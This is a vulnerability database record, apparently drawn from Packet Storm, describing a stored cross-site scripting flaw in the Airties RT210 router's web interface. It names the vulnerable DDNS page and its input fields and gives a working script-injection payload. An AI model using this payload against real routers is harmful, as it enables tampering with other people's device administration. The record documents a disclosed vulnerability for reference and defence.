ID
VAR-E-201506-0495
TITLE
Airties RT210 Cross Site Scripting
Trust: 0.5
DESCRIPTION
Airties RT210 suffers from a stored cross site scripting vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | airties | model: | rt210 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Airties RT210 Web Interface Stored XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: B3mB4m
[~] Contact : b3mb4m@gmail.com
[+] Greetz : SYS & & KnocKout & Septemb0x
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : Airties
|~Affected Version : AirRT210
|~Official Web: http://www.airties.com
|~RISK : Hight
----------------------------------------------------------
Proof video: https://www.youtube.com/watch?v=OOZwGeG8p3M
----------------------------------------------------------
Post
----------------------------------------------------------
Vul Link : http://192.168.2.1/ddns.stm
1) <input maxlength="49" size="50" name="ddns_domainame" value="">
2) <input maxlength="49" size="50" name="ddns_account" value="">
Payload : '"><SCrIpT>alert("B3mB4m")</ScRiPt>
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
xss
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
CREDITS
B3mB4m
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 132178 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 132178 |
LAST UPDATE DATE
2022-07-27T09:40:15.127000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 132178 | date: | 2015-06-05T12:02:22 |